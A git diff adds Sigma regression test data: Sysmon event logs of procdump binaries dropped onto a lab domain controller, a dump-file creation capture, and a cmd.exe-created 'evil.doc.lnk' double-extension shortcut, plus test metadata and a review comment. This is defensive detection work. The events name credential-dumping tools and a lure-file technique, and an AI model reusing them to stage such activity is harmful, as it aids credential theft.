zzZuw17M(TyA*cH~lE?AB-ID*0XWKgMj;Ot3i5at#-1%kwGnek!_ssqOf%edj>>X>S z_;1Po!1k_;?Oh(ab?lLNe{Sy-M!YA=`IwCMjwPDmy&tpRvStczOT5|MMbc(Wz#M=B zMKSS*?Z#foqnHtM&f6DJyTKCEPEB$@uy;_9T!<)VY!I~+&E%9y$yFp`0(EHSAH}**$#pQf**_RQu8!U0kyd?LK z^sZU6{(7in1zAzq-eAoXk1TlG?7kcdmYo>T)$)h0c#zzwG zwVlo>3?JTRc7r9F;k~`J5UiQP+Y;}Fup9HgK4Xt<)dfbo@v-Dl<;l^1bmZ=}kvk~P z772eYOZ?zqlKc41g*}%&I_;~uUA=aLHB&sYN$$ipMVZf^eDzhCIbOTL znkgPx@+h#~7-6&<2PNLy54YYBKD^EB21_)d@k`GQ#CP+c$?V`mS~3e34BYRHB)$7;@uE-Lw={rXg3Z^9vyyc z?V_ZJ+6|WY#WP9n^!&A%vzBi>Wj1wwk?|DPO!3H)M}h5z_T6)eyA$qTNW42tI_q!Y z!`sYmutYPw`@k>Cnkl?3@oosafi7jyB2MEE_uu$Z@@T|06@}+U)NZiE;(sQ&UmTW~ 
zwSIbj-u9VZyTO_%9$E4zNV{=F;$3ifbr|tBvl}eY4DZS47Rj0^ye;u=2)jW&P)Anx zi+&|}G^+X4cXy4b-C&8E&q#7tF8HDMW7F^G5;MpBTF6yX*a%>c+XjVcNp zb@nl=teFR2HJ-2*;|U2%BfjrRd=D)h5@CE<;!%80d&Y{6c^eze`H;#j;X4PTT39oM zucdvh{yiOnw;H}XCBD-ZT@_(`S>lHYF899MHe~)|V{zhs%y+=}vSte3y5Rf1#5e8D zp%KQHC00#$xi9H*f99%d)=xczT7&Ur%@n?M!FQL$_l4!xcR3N!`j;iH`islGIsMI? zhxWfbCll{GT>r9W3g5cmyIbNrWcA_&zeE&YmiYQ6mpk)tcJCGMc6+@N?JJr=_*JZ| znZh?ze4Tjz*dy_s`O6~)e8+uq#zN6HgPOV^oK8Nrtr1Im%eZMUK~bVqhS@q zM~$f+M)>~Z;$8WEIPo_7t}#pWhc|1c@V3O;SnliPyT(EgFUTIy_iXn` ze!T7cI*j(f?7PM+(H}opGsO=}ei-dRu-`S-&4tDT_OpE``QZL0W?^L8fh_T@UtR8~ zS90^07d_If8$Le5?LgK{@xhW00sJugCB7XK8$}pjmN@ndmwU;ud-5Ke+9J01^d@m;pp8R7EF5;HMx vUHQtby*J$3@`D%8^Ww{zDSSi0S60O}e)MsgwU2Yv?z^Zp#Ha&x%z^&`6wr+D literal 0 HcmV?d00001 diff --git a/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.json b/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.json new file mode 100644 index 000000000..c5be894a5 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.json 
@@ -0,0 +1,306 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:43:34.136421Z" + } + }, + "EventRecordID": 26359, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:43:34.134", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump64.exe", + "CreationUtcTime": "2025-10-24 23:43:34.134", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:43:34.154339Z" + } + }, + "EventRecordID": 26362, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:43:34.145", + "ProcessGuid": 
"5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump64.exe:Zone.Identifier", + "CreationUtcTime": "2022-11-03 15:55:14.000", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:43:34.160852Z" + } + }, + "EventRecordID": 26366, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:43:34.145", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump64a.exe", + "CreationUtcTime": "2025-10-24 23:43:34.145", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:43:34.177439Z" + } + }, + "EventRecordID": 26369, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 
+ } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:43:34.177", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump64a.exe:Zone.Identifier", + "CreationUtcTime": "2022-11-03 15:55:14.000", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:43:34.183790Z" + } + }, + "EventRecordID": 26373, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:43:34.178", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump.exe", + "CreationUtcTime": "2025-10-24 23:43:34.178", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, 
+ "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:43:34.211790Z" + } + }, + "EventRecordID": 26376, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:43:34.209", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump.exe:Zone.Identifier", + "CreationUtcTime": "2022-11-03 15:55:14.000", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/info.yml b/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/info.yml new file mode 100644 index 000000000..a5cb1267d --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/info.yml @@ -0,0 +1,13 @@ +id: ef67d58b-a7c2-434f-af87-34ae280a2968 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 8fbf3271-1ef6-4e94-8210-03c2317947f6 + title: Cred Dump Tools Dropped Files +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.evtx 
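Review bot: `match_count: 1` looks inconsistent with the evtx content shown in the JSON above. The capture holds six file-creation events from explorer.exe: the three binaries this PR adds coverage for (`procdump64.exe`, `procdump64a.exe`, `procdump.exe`) and their three `:Zone.Identifier` streams. If `match_count` is the number of events the rule matches, the updated rule should yield 3 here (or 6 if the `TargetFilename` comparison is a `contains` rather than `endswith`, since the stream names contain the same strings), and a value of 1 would either fail the CI run or mean the new markers are not matching at all. Please confirm whether the field is an exact count or an at-least-one check and adjust accordingly, and replace `description: N/A` with a note that the files were dropped into the Downloads folder via explorer.exe.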
diff --git a/regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.evtx b/regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.evtx new file mode 100644 index 0000000000000000000000000000000000000000..b03d00a137629020b5eb8c7ec4f0a425d492ffa4 GIT binary patch literal 69632 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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.json b/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.json new file mode 100644 index 000000000..615f60c7b --- /dev/null 
+++ b/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:54:01.546728Z" + } + }, + "EventRecordID": 86290, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:54:01.546", + "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ProcessId": 10048, + "Image": "C:\\Windows\\system32\\cmd.exe", + "TargetFilename": "C:\\evil.doc.lnk", + "CreationUtcTime": "2025-10-24 23:54:01.546", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml b/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml new file mode 100644 index 000000000..e82d1a336 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml 
@@ -0,0 +1,13 @@ +id: fbe93ba9-3124-4488-b6d8-ca3f7bb34c4b +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 3215aa19-f060-4332-86d5-5602511f3ca8 + title: Suspicious LNK Double Extension File Created +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.evtx 
